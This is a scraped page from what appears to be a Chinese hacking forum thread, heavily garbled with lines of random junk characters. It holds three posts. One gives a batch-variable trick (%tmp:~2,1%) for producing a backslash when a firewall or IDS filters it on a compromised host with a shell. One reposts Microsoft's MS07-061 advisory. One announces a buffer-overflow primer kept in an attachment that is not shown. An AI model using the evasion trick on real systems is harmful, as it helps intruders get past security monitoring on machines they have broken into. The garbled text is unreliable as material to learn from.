    6 E$ r' P& j) L& Z" F, M  J
    - h: ?* L1 R2 x7 R
    8 T7 h" y0 B: }9 o+ I0 V& o
    4 f- b( a* U- P) k4 G( |$ I+ U
    . q6 B, n0 x- X2 O3 e" ?
    / c0 j( [4 A! ~. e; i

    - U+ S- ~& `/ P( D9 Y% ^7 e) U, F" T& k& Y7 X( s# U8 R

    ) ~! K! L! N+ Q5 w# c2 j公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    BT 之  被过滤解决方法:邪恶的一小段代码
    当你拿到shell以后 发现对方的 不知道是防火墙 还是 ids 还是 hips 或者某某山寨产品 竟然把
    : w$ x3 z6 V$ a2 W0 Q
    给过滤了 ,无法路径跳转 很不方便的说
    : l& I% U5 {& q  C3 I  x
    下面提供邪恶的一小段代码 以备急时所需

    & s, x  n2 x/ D; h
    %tmp:~2,1%

    $ q2 M8 }$ s: n1 j: M* |
    [/quote]% y3 a1 O! {9 C8 \0 }4 s. X

    . A' H- D8 L. n1 D. D[quote]
    5 q9 B& K1 [6 ?' F3 P
    update : %appdata:~12,1%

    . T6 F* ~9 P* e9 u
    + d. Z' c) J: `4 ^/ N* n/ c4 G
    / d/ F2 J% c' M8 s3 w, O  s) a# E4 f7 z4 u

    - m1 ?. I9 C6 W2 g8 d2 V/ V. J2 |9 D( b# W

    6 D) G' L" w  C. z. ]! x9 G. ?6 X
    ( w. k6 u% p' U% F) N  f8 a$ A& n8 R, A& z0 x1 @

    8 @6 y; d& U& l& b( F
    $ ?  Y; I9 t3 b- R
    % u8 r% J' i) H7 G
    : \  w6 [' n( x; i0 O) U  ?/ _8 [9 n) e1 h3 M
    9 L+ ~8 R* }5 w: e: f7 ?( \1 L
    & w2 K& ]7 {$ [- K/ t6 E

    8 s- d* ]* N. F+ Y
    . \$ c) B0 \4 P* M4 y5 p) e
    7 T* c( }; u- E) K9 D公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0

    : [) c( q" b& ?5 h9 w
    摘要
    0 C4 S! _! B1 q+ I6 D+ D6 ]
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
    % g: _9 e$ S3 \! ?+ q0 d
    建议。 Microsoft 建议用户立即应用此更新。

    ' \6 P$ i! W6 ]
    受影响的软件
    2 N, j. r# @, ]+ c4 a' @
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045
    $ Z6 {- Z( ]9 F# }- I
    不受影响的软件

    $ T7 x+ C- L/ l0 r: i3 g, J  X" d
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64

    ) w3 r6 D1 K' J, C
    微软的安全公告:

    3 p. N) @, D' V' c
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx

    6 R+ @+ ?$ l; G* i, v, M3 X
    (以上链接均连到第三方网站)

    * x& a& i; e+ e- R! Q6 R3 k, I2 C. v0 c( J& o$ V

    / {9 X1 N$ N4 @) a4 e/ s3 z( |/ y. b/ b+ V
    6 P. q) ]9 O7 @

    9 ^: i! A  e3 p- q( [" t/ Q
    $ l9 v# d8 R6 h$ t5 z
    ( Q3 }5 P/ A+ z% ?
    1 @% k5 j3 Y  i* I7 Z. q
    ( j8 y  v2 o4 u( r% y" _5 `  ~' _( U! l* Z) R& o! z  Y! }* O

    0 Q1 O/ F. Z6 G/ |1 D$ q. U; }# ^$ Q: k# K5 t( c9 ?/ m

    - u9 |( x3 \8 J2 E" I2 X
    7 k! e: I) R$ B5 e! v( h; x) p6 K% e. O. A& z& Z- k0 Q+ F

    5 [& \' [- P+ j. @% R& i4 p. r
    $ D5 T0 ]' J' @' M% b1 V& V1 j+ t9 _5 b5 \8 S! O
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    缓冲区溢出快速入门
    适用人群:对缓冲区溢出一向神往但不得要领的广大群众。不适用于:已经掌握了缓冲区溢出和利用知识的大牛小牛们。

    : e0 @# Q1 V' F8 N4 N  K
    详细情况请参考附件!

    ! p1 q4 j7 Y4 Z( Y, T7 }; i
    yichu.rar

    1 `  q: j) A8 f4 w) c! q5 T" j. {5 D5 @" H

    * F1 S4 [9 b: t3 J3 [
    ( I& m) U0 i6 a& |* B
    * X$ S/ a0 T. z2 O" h) m
    9 E% w, z$ M& S
    : N( i) x& k' t. Z
    $ Y& c- q6 R0 h2 f& G$ G
    ) ]& q  A  j+ Y4 h4 q) P# j! A% H1 c& y2 v

    ' n3 R* Z# M. {/ t
    - [6 L4 d$ A0 A7 j
    5 W: j# B1 F/ \! H' p- G0 F8 A9 C9 t% U

    4 J) |' v! Z4 w% N
    $ E: _6 A9 a2 B; o' A% K
    5 e4 s% c3 {) c5 o* P' _+ m, Z5 A5 \0 w: F4 t# D
    $ h9 V  K  m0 ]0 b& j0 M9 x/ G
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表